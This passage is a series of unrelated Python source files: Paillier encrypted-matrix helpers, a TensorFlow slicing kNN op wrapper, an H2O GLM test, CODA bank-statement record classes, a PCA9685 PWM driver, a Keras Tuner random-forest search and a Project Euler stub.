if A.shape[0] != encrypted_B.shape[0]:
LOGGER.debug("A and encrypted_B shape are not consistent: " + str(A.shape) + ":" + str(encrypted_B.shape))
exit(1)
res = []
for i in range(len(A)):
res.append(encrypt_matmul(public_key, A[i], encrypted_B[i]))
return np.array(res)
def decrypt(private_key: PaillierPrivateKey, x):
return private_key.decrypt(x)
def decrypt_scalar(private_key: PaillierPrivateKey, x):
return private_key.decrypt(x)
def decrypt_array(private_key: PaillierPrivateKey, X):
decrypt_x = []
for i in range(X.shape[0]):
elem = private_key.decrypt(X[i])
decrypt_x.append(elem)
return np.array(decrypt_x, dtype=np.float64)
def decrypt_matrix(private_key: PaillierPrivateKey, A):
"""
decrypt matrix with dim 1, 2 or 3
:param private_key:
:param A:
:return:
"""
# remember the original rank so a 1-D input can be squeezed back after decryption
was_1d = len(A.shape) == 1
if was_1d:
A = np.expand_dims(A, axis=0)
decrypt_A = []
for i in range(len(A)):
row = []
for j in range(len(A[i])):
if len(A.shape) == 3:
row.append([private_key.decrypt(A[i, j, k]) for k in range(len(A[i][j]))])
else:
row.append(private_key.decrypt(A[i, j]))
decrypt_A.append(row)
result = np.array(decrypt_A, dtype=np.float64)
if was_1d:
result = np.squeeze(result, axis=0)
return result
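# Round-trip sketch of the helpers above (key generation can take a few seconds;
# shapes and values are illustrative only):
#   pub, priv = generate_encryption_key_pair()
#   enc_B = encrypt_matrix(pub, np.array([[1.0, 2.0], [3.0, 4.0]]))
#   enc_C = encrypt_matmul(pub, np.array([[1.0, 0.0]]), enc_B)
#   decrypt_matrix(priv, enc_C)        # -> array([[1., 2.]])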
|
import abc
class ValidationRule(abc.ABC):
message: dict = None
@abc.abstractmethod
def is_valid(self) -> bool:
raise NotImplementedError("Not Implemented Yet")
|
import tensorflow as tf
from tensorflow.python.framework import ops
'''
Wrap the module
'''
_nknn_op = tf.load_op_library('slicing_knn.so')
def check_tuple(in_tuple, tuple_name: str, tuple_type: type):
if in_tuple is None:
raise ValueError("<%s> argument is not specified!" % tuple_name)
if len(in_tuple) != 2:
raise ValueError("<%s> argument has to be a tuple of size 2!" % tuple_name)
if (type(in_tuple[0]) is not tuple_type) or (type(in_tuple[1]) is not tuple_type):
raise ValueError("<%s> argument has to be of type Tuple[%s, %s]!" % (tuple_name, tuple_type.__name__, tuple_type.__name__))
if (in_tuple[0] < 0) or (in_tuple[1] < 0):
raise ValueError("<%s> tuple has to contain only positive values!" % tuple_name)
def SlicingKnn(K : int, coords, row_splits, features_to_bin_on=None, n_bins=None, bin_width=None):
'''
Perform kNN search with slicing method
@type K: int
@param K: number of neighbours to search for
@type coords: tf.Tensor
@param coords: coordinate tensor
@type row_splits: tf.Tensor
@param row_splits: row splits tensor
@type features_to_bin_on: Tuple[int, int]
@param features_to_bin_on: indices of features to bin on
@type n_bins: Tuple[int, int]
@param n_bins: number of bins to split phase space for kNN search
@type bin_width: Tuple[float, float]
@param bin_width: width of phase-space bins
'''
# type and values check for input parameters
check_tuple(features_to_bin_on,"features_to_bin_on",int)
n_features = coords.shape[1]
if (features_to_bin_on[0]>=n_features) or (features_to_bin_on[1]>=n_features) or (features_to_bin_on[0]==features_to_bin_on[1]):
raise ValueError("Value error for <features_to_bin_on>!")
if ((n_bins is None) and (bin_width is None)) or ((n_bins is not None) and (bin_width is not None)):
raise ValueError("Specify either <n_bins> OR <bin_width> argument but not both!")
if n_bins is None:
check_tuple(bin_width,"bin_width",float)
else:
check_tuple(n_bins,"n_bins",int)
# features to do 2d phase-space binning on
bin_f1 = features_to_bin_on[0]
bin_f2 = features_to_bin_on[1]
# find min/max in tensor taking into account row_splits
# TODO is creation of ragged tensor an expensive operation (memory and time wise)?
coords_ragged = tf.RaggedTensor.from_row_splits(values=coords, row_splits=row_splits)
r_max = tf.map_fn(tf.math.argmax, coords_ragged, fn_output_signature=tf.int64)
r_min = tf.map_fn(tf.math.argmin, coords_ragged, fn_output_signature=tf.int64)
# contains minimum and maximum coordinates of the two binning dimensions in the coords tensor
_phase_space_bin_boundary = []
if n_bins is None:
n_bins = [float('inf'),float('inf')]
for i_split in range(0,len(row_splits)-1):
min_coords = r_min[i_split]
max_coords = r_max[i_split]
_min = coords[min_coords[bin_f1]+row_splits[i_split].numpy()][bin_f1].numpy()
_max = coords[max_coords[bin_f1]+row_splits[i_split].numpy()][bin_f1].numpy()
_phase_space_bin_boundary.append((_min-0.00001*(_max-_min)).item())
_phase_space_bin_boundary.append((_max+0.00001*(_max-_min)).item())
_min = coords[min_coords[bin_f2]+row_splits[i_split].numpy()][bin_f2].numpy()
_max = coords[max_coords[bin_f2]+row_splits[i_split].numpy()][bin_f2].numpy()
_phase_space_bin_boundary.append((_min-0.00001*(_max-_min)).item())
_phase_space_bin_boundary.append((_max+0.00001*(_max-_min)).item())
# find n_bins for the current batch
if bin_width is not None:
n_bins_1 = int((_phase_space_bin_boundary[-3] - _phase_space_bin_boundary[-4]) / bin_width[0]) + 1
n_bins_2 = int((_phase_space_bin_boundary[-1] - _phase_space_bin_boundary[-2]) / bin_width[1]) + 1
if n_bins_1<n_bins[0]:
n_bins[0] = n_bins_1
if n_bins_2<n_bins[1]:
n_bins[1] = n_bins_2
if type(n_bins) is list:
n_bins = tuple(n_bins)
return _nknn_op.SlicingKnn(n_neighbours=K, coords=coords, row_splits=row_splits, n_bins=n_bins, features_to_bin_on=features_to_bin_on, phase_space_bin_boundary=_phase_space_bin_boundary)
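# Usage sketch (shapes and bin counts are illustrative; exactly one of <n_bins> or
# <bin_width> must be given, per the checks above; the op returns indices and distances,
# as reflected by the gradient registration below):
#   coords = tf.random.uniform((1000, 4))
#   row_splits = tf.constant([0, 500, 1000], dtype=tf.int64)
#   idx, dist = SlicingKnn(K=16, coords=coords, row_splits=row_splits,
#                          features_to_bin_on=(0, 1), n_bins=(8, 8))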
_sknn_grad_op = tf.load_op_library('select_knn_grad.so')
@ops.RegisterGradient("SlicingKnn")
def _SelectKnnGrad(op, gradidx, dstgrad):
coords = op.inputs[0]
indices = op.outputs[0]
distances = op.outputs[1]
coord_grad = _sknn_grad_op.SelectKnnGrad(grad_distances=dstgrad, indices=indices, distances=distances, coordinates=coords)
# return coord_grad, None, None #no grad for row splits and masking values
return coord_grad
|
import unittest, time, sys, random
sys.path.extend(['.','..','../..','py'])
import h2o2 as h2o
import h2o_cmd, h2o_import as h2i, h2o_jobs, h2o_glm
from h2o_test import verboseprint, dump_json, OutputObj
def write_syn_dataset(csvPathname, rowCount, colCount, SEED):
r1 = random.Random(SEED)
dsf = open(csvPathname, "w+")
for i in range(rowCount):
rowData = []
for j in range(colCount):
ri = r1.randint(0,1)
rowData.append(ri)
ri = r1.randint(0,1)
rowData.append(ri)
rowDataCsv = ",".join(map(str,rowData))
dsf.write(rowDataCsv + "\n")
dsf.close()
class Basic(unittest.TestCase):
def tearDown(self):
h2o.nodes[0].log_download()
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init(1,java_heap_GB=13)
@classmethod
def tearDownClass(cls):
### time.sleep(3600)
h2o.tear_down_cloud()
def test_GLM_many_cols(self):
SYNDATASETS_DIR = h2o.make_syn_dir()
tryList = [
# (2, 100, 'cA', 300),
# (4, 200, 'cA', 300),
(10000, 1000, 'cB', 300),
(10000, 3000, 'cC', 500),
]
### h2b.browseTheCloud()
lenNodes = len(h2o.nodes)
for (rowCount, colCount, hex_key, timeoutSecs) in tryList:
SEEDPERFILE = random.randint(0, sys.maxint)
# csvFilename = 'syn_' + str(SEEDPERFILE) + "_" + str(rowCount) + 'x' + str(colCount) + '.csv'
csvFilename = 'syn_' + "binary" + "_" + str(rowCount) + 'x' + str(colCount) + '.csv'
csvPathname = SYNDATASETS_DIR + '/' + csvFilename
print "Creating random", csvPathname
write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE)
parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key, timeoutSecs=180, doSummary=False)
pA = h2o_cmd.ParseObj(parseResult)
iA = h2o_cmd.InspectObj(pA.parse_key)
parse_key = pA.parse_key
numRows = iA.numRows
numCols = iA.numCols
labelList = iA.labelList
expected = []
allowedDelta = 0
labelListUsed = list(labelList)
response = 'C' + str(len(labelListUsed)-1) # last column
labelListUsed.remove(response)
numColsUsed = numCols - 1
for trial in range(1):
# family [u'gaussian', u'binomial', u'poisson', u'gamma', u'tweedie']
# link [u'family_default', u'identity', u'logit', u'log', u'inverse', u'tweedie']
# can we do classification with probabilities?
# are only lambda and alpha grid searchable?
parameters = {
'validation_frame': parse_key,
'ignored_columns': None,
# FIX! for now just use a column that's binomial
'response_column': response, # can't take index now?
# FIX! when is this needed? redundant for binomial?
'balance_classes': False,
'max_after_balance_size': None,
'standardize': False,
'family': 'binomial',
'link': None,
'alpha': '[1e-4]',
'lambda': '[0.5,0.25, 0.1]',
'prior1': None,
'lambda_search': None,
'nlambdas': None,
'lambda_min_ratio': None,
# 'use_all_factor_levels': False,
}
model_key = 'many_cols_glm.hex'
bmResult = h2o.n0.build_model(
algo='glm',
model_id=model_key,
training_frame=parse_key,
parameters=parameters,
timeoutSecs=300)
bm = OutputObj(bmResult, 'bm')
modelResult = h2o.n0.models(key=model_key)
model = OutputObj(modelResult['models'][0]['output'], 'model')
h2o_glm.simpleCheckGLM(self, model, parameters, labelList, labelListUsed)
cmmResult = h2o.n0.compute_model_metrics(model=model_key, frame=parse_key, timeoutSecs=60)
cmm = OutputObj(cmmResult, 'cmm')
mmResult = h2o.n0.model_metrics(model=model_key, frame=parse_key, timeoutSecs=60)
mm = OutputObj(mmResult, 'mm')
prResult = h2o.n0.predict(model=model_key, frame=parse_key, timeoutSecs=60)
pr = OutputObj(prResult['model_metrics'][0]['predictions'], 'pr')
if __name__ == '__main__':
h2o.unit_main()
|
import re
from pycoda.fields import (
BalanceField,
BooleanField,
DateField,
EmptyField,
NumericField,
StringField,
ZeroesField,
)
class RecordIdentification(object):
INITIAL = 0
OLD_BALANCE = 1
TRANSACTION = 2
INFORMATION = 3
EXTRA_MESSAGE = 4
NEW_BALANCE = 8
FINAL = 9
class RecordArticle(object):
DEFAULT = 1
PURPOSE = 2
DETAIL = 3
class Record(object):
IDENTIFICATION = None
ARTICLE = None
def __init__(self):
self._fields = ()
def __getattr__(self, item):
"""By implementing this, all the fields their values are accessible"""
field_name = "_{item}_field".format(item=item)
if field_name not in self.__dict__.keys():
raise AttributeError("Unknown value")
return self.__dict__[field_name].value
def __setattr__(self, key, value):
"""By implementing this, all the fields their values are accessible"""
field_name = "_{key}_field".format(key=key)
if field_name in self.__dict__.keys():
self.__dict__[field_name].value = value
else:
super(Record, self).__setattr__(key, value)
def dumps(self):
return "".join(field.dumps() for field in self._fields)
def loads(self, string):
for field in self._fields:
field.loads(string[field.position : field.position + field.length])
def field_dict(self):
"""Dict-like representation of all field values"""
regex = re.compile(r"^_(?P<name>((\w+)(_)?)+)_field")
dictionary = {}
for key, field in self.__dict__.items():
if field in self._fields:
match = regex.match(key)
if match is not None:
dictionary[match.group("name")] = field.value
return dictionary
class InitialRecord(Record):
IDENTIFICATION = RecordIdentification.INITIAL
ARTICLE = None
APPLICATION_CODE = "05"
VERSION_CODE = 2
def __init__(
self,
creation_date=None,
bank_identification_number=None,
is_duplicate=None,
reference=None,
addressee=None,
bic=None,
account_holder_reference=None,
free=None,
transaction_reference=None,
related_reference=None,
):
super(InitialRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=InitialRecord.IDENTIFICATION
)
self._zeroes_field = ZeroesField(1, 4)
self._creation_date_field = DateField(5, 6, value=creation_date)
self._bank_identification_number_field = NumericField(
11, 3, value=bank_identification_number
)
self._application_code_field = StringField(
14, 2, value=InitialRecord.APPLICATION_CODE
)
self._duplicate_field = BooleanField(
16, 1, value=is_duplicate, true_value="D", false_value=" "
)
self._empty_field0 = EmptyField(17, 7)
self._reference_field = StringField(24, 10, value=reference)
self._addressee_field = StringField(34, 26, value=addressee)
self._bic_field = StringField(60, 11, value=bic)
self._account_holder_reference_field = NumericField(
71, 11, value=account_holder_reference, head="0"
)
self._empty_field1 = EmptyField(82, 1)
self._free_field = StringField(83, 5, value=free)
self._transaction_reference_field = StringField(
88, 16, value=transaction_reference, tag="20/1"
)
self._related_reference_field = StringField(
104, 16, value=related_reference, tag="21/1"
)
self._empty_field2 = EmptyField(120, 7)
self._version_code_field = NumericField(
127, 1, value=InitialRecord.VERSION_CODE
)
self._fields = (
self._identification_field,
self._zeroes_field,
self._creation_date_field,
self._bank_identification_number_field,
self._application_code_field,
self._duplicate_field,
self._empty_field0,
self._reference_field,
self._addressee_field,
self._bic_field,
self._account_holder_reference_field,
self._empty_field1,
self._free_field,
self._transaction_reference_field,
self._related_reference_field,
self._empty_field2,
self._version_code_field,
)
class OldBalanceRecord(Record):
IDENTIFICATION = RecordIdentification.OLD_BALANCE
ARTICLE = None
def __init__(
self,
account_structure=None,
serial_number=None,
account_number=None,
balance_sign=None,
old_balance=None,
balance_date=None,
account_holder_name=None,
account_description=None,
bank_statement_serial_number=None,
):
super(OldBalanceRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=OldBalanceRecord.IDENTIFICATION
)
self._account_structure_field = NumericField(1, 1, value=account_structure)
self._serial_number_field = NumericField(2, 3, value=serial_number, tag="28c/1")
self._account_number_field = StringField(5, 37, value=account_number)
self._balance_sign_field = NumericField(42, 1, value=balance_sign, tag="60F/1")
self._old_balance_field = BalanceField(43, value=old_balance, tag="60F/4")
self._balance_date_field = DateField(58, 6, value=balance_date, tag="60F/2")
self._account_holder_name_field = StringField(64, 26, value=account_holder_name)
self._account_description_field = StringField(90, 35, value=account_description)
self._bank_statement_serial_number_field = NumericField(
125, 3, value=bank_statement_serial_number
)
self._fields = (
self._identification_field,
self._account_structure_field,
self._serial_number_field,
self._account_number_field,
self._balance_sign_field,
self._old_balance_field,
self._balance_date_field,
self._account_holder_name_field,
self._account_description_field,
self._bank_statement_serial_number_field,
)
class TransactionRecord(Record):
IDENTIFICATION = RecordIdentification.TRANSACTION
ARTICLE = RecordArticle.DEFAULT
def __init__(
self,
serial_number=None,
detail_number=None,
bank_reference_number=None,
balance_sign=None,
balance=None,
balance_date=None,
transaction_code=None,
reference_type=None,
reference=None,
booking_date=None,
bank_statement_serial_number=None,
globalisation_code=None,
transaction_sequence=None,
information_sequence=None,
):
super(TransactionRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=TransactionRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=TransactionRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._bank_reference_number_field = StringField(
10, 21, value=bank_reference_number, tag="61/8"
)
self._balance_sign_field = NumericField(31, 1, value=balance_sign, tag="61/3")
self._balance_field = BalanceField(32, value=balance, tag="61/5")
self._balance_date_field = DateField(47, 6, value=balance_date, tag="61/1")
self._transaction_code_field = NumericField(
53, 8, value=transaction_code, tag="61/6"
)
self._reference_type_field = NumericField(61, 1, value=reference_type)
self._reference_field = StringField(62, 53, value=reference, tag="61/9")
self._booking_date_field = DateField(115, 6, value=booking_date, tag="61/2")
self._bank_statement_serial_number_field = NumericField(
121, 3, value=bank_statement_serial_number, tag="28/c"
)
self._globalisation_code_field = NumericField(124, 1, value=globalisation_code)
self._transaction_sequence_field = BooleanField(
125, 1, value=transaction_sequence, true_value="1", false_value="0"
)
self._empty_field = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._bank_reference_number_field,
self._balance_sign_field,
self._balance_field,
self._balance_date_field,
self._transaction_code_field,
self._reference_type_field,
self._reference_field,
self._booking_date_field,
self._bank_statement_serial_number_field,
self._globalisation_code_field,
self._transaction_sequence_field,
self._empty_field,
self._information_sequence_field,
)
class TransactionPurposeRecord(Record):
IDENTIFICATION = RecordIdentification.TRANSACTION
ARTICLE = RecordArticle.PURPOSE
def __init__(
self,
serial_number=None,
detail_number=None,
bank_statement=None,
client_reference=None,
bic=None,
purpose_category=None,
purpose=None,
transaction_sequence=None,
information_sequence=None,
):
super(TransactionPurposeRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=TransactionPurposeRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=TransactionPurposeRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._bank_statement_field = StringField(10, 53, value=bank_statement)
self._client_reference_field = StringField(63, 35, value=client_reference)
self._bic_field = StringField(98, 11, value=bic)
self._empty_field0 = EmptyField(109, 8)
self._purpose_category_field = StringField(117, 4, value=purpose_category)
self._purpose_field = StringField(121, 4, value=purpose)
self._transaction_sequence_field = BooleanField(
125, 1, value=transaction_sequence, true_value="1", false_value="0"
)
self._empty_field1 = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._bank_statement_field,
self._client_reference_field,
self._bic_field,
self._empty_field0,
self._purpose_category_field,
self._purpose_field,
self._transaction_sequence_field,
self._empty_field1,
self._information_sequence_field,
)
class TransactionDetailRecord(Record):
IDENTIFICATION = RecordIdentification.TRANSACTION
ARTICLE = RecordArticle.DETAIL
def __init__(
self,
serial_number=None,
detail_number=None,
account_number=None,
account_holder_name=None,
description=None,
information_sequence=None,
):
super(TransactionDetailRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=TransactionDetailRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=TransactionDetailRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._account_number_field = StringField(10, 37, value=account_number)
self._account_holder_name_field = StringField(47, 35, value=account_holder_name)
self._description_field = StringField(82, 43, value=description)
self._sequence_code_field = ZeroesField(125, 1)
self._empty_field = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._account_number_field,
self._account_holder_name_field,
self._description_field,
self._sequence_code_field,
self._empty_field,
self._information_sequence_field,
)
class InformationRecord(Record):
IDENTIFICATION = RecordIdentification.INFORMATION
ARTICLE = RecordArticle.DEFAULT
def __init__(
self,
serial_number=None,
detail_number=None,
reference_number=None,
transaction_code=None,
reference_type=None,
reference=None,
transaction_sequence=None,
information_sequence=None,
):
super(InformationRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=InformationRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=InformationRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._reference_number_field = StringField(
10, 21, value=reference_number, tag="61/8"
)
self._transaction_code_field = NumericField(
31, 8, value=transaction_code, tag="61/6"
)
self._reference_type_field = NumericField(39, 1, value=reference_type)
self._reference_field = StringField(40, 73, value=reference, tag="86")
self._empty_field0 = EmptyField(113, 12)
self._transaction_sequence_field = BooleanField(
125, 1, value=transaction_sequence, true_value="1", false_value="0"
)
self._empty_field1 = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._reference_number_field,
self._transaction_code_field,
self._reference_type_field,
self._reference_field,
self._empty_field0,
self._transaction_sequence_field,
self._empty_field1,
self._information_sequence_field,
)
class InformationPurposeRecord(Record):
IDENTIFICATION = RecordIdentification.INFORMATION
ARTICLE = RecordArticle.PURPOSE
def __init__(
self,
serial_number=None,
detail_number=None,
bank_reference_number=None,
information_sequence0=None,
information_sequence1=None,
):
super(InformationPurposeRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=InformationPurposeRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=InformationPurposeRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._bank_reference_number_field = StringField(
10, 105, value=bank_reference_number
)
self._empty_field0 = EmptyField(115, 10)
self._information_sequence_field0 = BooleanField(
125, 1, value=information_sequence0, true_value="1", false_value="0"
)
self._empty_field1 = EmptyField(126, 1)
self._information_sequence_field1 = BooleanField(
127, 1, value=information_sequence1, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._bank_reference_number_field,
self._empty_field0,
self._information_sequence_field0,
self._empty_field1,
self._information_sequence_field1,
)
class InformationDetailRecord(Record):
IDENTIFICATION = RecordIdentification.INFORMATION
ARTICLE = RecordArticle.DETAIL
def __init__(
self,
serial_number=None,
detail_number=None,
bank_reference_number=None,
information_sequence=None,
):
super(InformationDetailRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=InformationDetailRecord.IDENTIFICATION
)
self._article_field = NumericField(1, 1, value=InformationDetailRecord.ARTICLE)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._bank_reference_number_field = StringField(
10, 90, value=bank_reference_number
)
self._empty_field0 = EmptyField(100, 25)
self._sequence_code_field = ZeroesField(125, 1)
self._empty_field1 = EmptyField(126, 1)
self._information_sequence_field = BooleanField(
127, 1, value=information_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._article_field,
self._serial_number_field,
self._detail_number_field,
self._bank_reference_number_field,
self._empty_field0,
self._sequence_code_field,
self._empty_field1,
self._information_sequence_field,
)
class NewBalanceRecord(Record):
IDENTIFICATION = RecordIdentification.NEW_BALANCE
ARTICLE = None
def __init__(
self,
serial_number=None,
account_number=None,
balance_sign=None,
new_balance=None,
balance_date=None,
sequence=None,
):
super(NewBalanceRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=NewBalanceRecord.IDENTIFICATION
)
self._serial_number_field = NumericField(1, 3, value=serial_number, tag="28c/1")
self._account_number_field = StringField(4, 37, value=account_number)
self._balance_sign_field = NumericField(41, 1, value=balance_sign, tag="62F/1")
self._new_balance_field = BalanceField(42, value=new_balance, tag="62F/4")
self._balance_date_field = DateField(57, 6, value=balance_date, tag="62F/2")
self._empty_field = EmptyField(63, 64)
self._sequence_field = BooleanField(
127, 1, value=sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._serial_number_field,
self._account_number_field,
self._balance_sign_field,
self._new_balance_field,
self._balance_date_field,
self._empty_field,
self._sequence_field,
)
class ExtraMessageRecord(Record):
IDENTIFICATION = RecordIdentification.EXTRA_MESSAGE
ARTICLE = None
def __init__(
self,
serial_number=None,
detail_number=None,
extra_message=None,
has_sequence=None,
):
super(ExtraMessageRecord, self).__init__()
self._identification_field = NumericField(
0, 1, value=ExtraMessageRecord.IDENTIFICATION
)
self._empty_field0 = EmptyField(1, 1)
self._serial_number_field = NumericField(2, 4, value=serial_number)
self._detail_number_field = NumericField(6, 4, value=detail_number)
self._empty_field1 = EmptyField(10, 22)
self._extra_message_field = StringField(32, 80, value=extra_message)
self._empty_field2 = EmptyField(112, 15)
self._sequence_field = BooleanField(
127, 1, value=has_sequence, true_value="1", false_value="0"
)
self._fields = (
self._identification_field,
self._empty_field0,
self._serial_number_field,
self._detail_number_field,
self._empty_field1,
self._extra_message_field,
self._empty_field2,
self._sequence_field,
)
class FinalRecord(Record):
IDENTIFICATION = RecordIdentification.FINAL
ARTICLE = None
def __init__(self, number_records=None, debit=None, credit=None, has_sequence=None):
super(FinalRecord, self).__init__()
self._identification_field = NumericField(0, 1, FinalRecord.IDENTIFICATION)
self._empty_field0 = EmptyField(1, 15)
self._number_records_field = NumericField(16, 6, value=number_records)
self._debit_field = BalanceField(22, value=debit)
self._credit_field = BalanceField(37, value=credit)
self._empty_field1 = EmptyField(52, 75)
self._sequence_field = BooleanField(
127, 1, value=has_sequence, true_value="1", false_value="2"
)
self._fields = (
self._identification_field,
self._empty_field0,
self._number_records_field,
self._debit_field,
self._credit_field,
self._empty_field1,
self._sequence_field,
)
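# Round-trip sketch for the record classes above (a sketch only; it assumes the pycoda
# field classes accept these illustrative values):
#   record = ExtraMessageRecord(serial_number=1, detail_number=1, extra_message="HELLO", has_sequence=False)
#   line = record.dumps()              # one fixed-width CODA line
#   parsed = ExtraMessageRecord()
#   parsed.loads(line)
#   parsed.field_dict()                # dict of parsed field values, e.g. extra_message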
|
"""
This module provides classes for interfacing with a PCA9685 PWM extension.
"""
import time
from myDevices.devices.i2c import I2C
from myDevices.devices.analog import PWM
from myDevices.plugins.analog import AnalogOutput
class PCA9685(PWM, I2C):
"""Base class for interacting with a PCA9685 extension."""
MODE1 = 0x00
PWM_BASE = 0x06
PRESCALE = 0xFE
M1_SLEEP = 1<<4
M1_AI = 1<<5
M1_RESTART = 1<<7
def __init__(self, slave=0x40, frequency=50):
"""Initializes PCA9685 device.
Arguments:
slave: The slave address
frequency: The PWM control frequency
"""
I2C.__init__(self, int(slave))
PWM.__init__(self, 16, 12, int(frequency))
self.VREF = 0
self.prescale = int(25000000.0/((2**12)*self.frequency))
self.mode1 = self.M1_RESTART | self.M1_AI
self.writeRegister(self.MODE1, self.M1_SLEEP)
self.writeRegister(self.PRESCALE, self.prescale)
time.sleep(0.01)
self.writeRegister(self.MODE1, self.mode1)
def __str__(self):
"""Returns friendly name."""
return "PCA9685(slave=0x%02X)" % self.slave
def __pwmRead__(self, channel):
"""Returns the value for the specified channel. Overrides PWM.__pwmRead__."""
addr = self.getChannelAddress(channel)
d = self.readRegisters(addr, 4)
start = d[1] << 8 | d[0]
end = d[3] << 8 | d[2]
return end-start
def __pwmWrite__(self, channel, value):
"""Writes the value to the specified channel. Overrides PWM.__pwmWrite__."""
addr = self.getChannelAddress(channel)
d = bytearray(4)
d[0] = 0
d[1] = 0
d[2] = (value & 0x0FF)
d[3] = (value & 0xF00) >> 8
self.writeRegisters(addr, d)
def getChannelAddress(self, channel):
"""Returns the address for the specified channel."""
return int(channel * 4 + self.PWM_BASE)
class PCA9685Test(PCA9685):
"""Class for simulating a PCA9685 device."""
def __init__(self):
"""Initializes the test class."""
self.registers = {}
PCA9685.__init__(self)
def readRegister(self, addr):
"""Read value from a register."""
if addr not in self.registers:
self.registers[addr] = 0
return self.registers[addr]
def readRegisters(self, addr, size):
"""Read value from a register."""
if addr not in self.registers:
self.registers[addr] = bytearray(size)
return self.registers[addr]
def writeRegister(self, addr, value):
"""Write value to a register."""
self.registers[addr] = value
def writeRegisters(self, addr, value):
"""Write value to a register."""
self.registers[addr] = value
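# Illustrative sketch (not part of the driver): how __pwmWrite__ packs a 12-bit
# duty-cycle value into the four LEDn ON/OFF bytes and how __pwmRead__ recovers
# it, assuming the ON time is left at 0 as in the methods above.
if __name__ == "__main__":
    def _pack_pwm_value(value):
        # bytes as written by __pwmWrite__: [ON_L, ON_H, OFF_L, OFF_H]
        return bytearray([0, 0, value & 0x0FF, (value & 0xF00) >> 8])

    def _unpack_pwm_value(d):
        # recover the value exactly as __pwmRead__ does: (OFF - ON) counts
        return (d[3] << 8 | d[2]) - (d[1] << 8 | d[0])

    assert _unpack_pwm_value(_pack_pwm_value(2048)) == 2048  # 50% duty at 12-bit resolution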
|
import os
import pathlib
import numpy as np
import keras_tuner as kt
from sklearn.preprocessing import OneHotEncoder
from sklearn import ensemble
from sklearn import metrics
from sklearn import model_selection
from sklearn import pipeline
from sklearn.metrics import accuracy_score
PATH = pathlib.Path(__file__).resolve().parent / "2_final data"
features = np.load(os.path.join(PATH, "train_val_features.npy"))
labels = np.load(os.path.join(PATH, "train_val_labels.npy"))
test_features = np.load(os.path.join(PATH, "test_features.npy"))
test_labels = np.load(os.path.join(PATH, "test_labels.npy"))
# One hot encode labels
labels = OneHotEncoder().fit_transform(X=labels.reshape(-1, 1)).toarray()
test_labels = OneHotEncoder().fit_transform(X=test_labels.reshape(-1, 1)).toarray()
# Define the model: Random Forest
class RF(kt.HyperModel):
def build(self, hp):
model = ensemble.RandomForestClassifier(
n_estimators=hp.Int("n_estimators", 30, 80, step=10),
max_depth=hp.Int("max_depth", 3, 10),
)
return model
hypermodel = RF()
# Find optimal hyperparameters
tuner = kt.tuners.SklearnTuner(
oracle=kt.oracles.BayesianOptimizationOracle(
# Keras docs: "Note that for this Tuner, the objective for the Oracle should always be set to Objective('score', direction='max')"
objective=kt.Objective("score", "max"),
max_trials=20,
),
hypermodel=hypermodel,
scoring=metrics.make_scorer(metrics.accuracy_score),
    # Would be more appropriate to prune the sets based on label overlap, and possibly also to do the kind of CV described in "Advances in Financial ML"
# but for now using .TimeSeriesSplit() with the gap parameter does the job
cv=model_selection.TimeSeriesSplit(5, gap=100),
project_name="Keras_tuner_metadata/RF",
overwrite=True,
)
tuner.search(features, labels)
# Show the results
tuner.results_summary(num_trials=3)
# Build the model with the optimal hyperparameters
best_hps = tuner.get_best_hyperparameters(num_trials=1)[0]
best_model = tuner.hypermodel.build(best_hps)
# # Do the final test on the test set
# best_model.fit(features, labels)
# predictions = best_model.predict(test_features)
# print('\n','Score on the test set: ',accuracy_score(test_labels, predictions))
|
'''
It can be seen that the number, 125874, and its double, 251748, contain exactly the same digits, but in a different order.
Find the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain the same digits.
'''
from functions import *
def allSameDigits(two, three, four, five, six):
'''Pre: the 5 arguments are all strings that have the same length.
Post: returns true if all the strings have the same digits.'''
#sort all of them
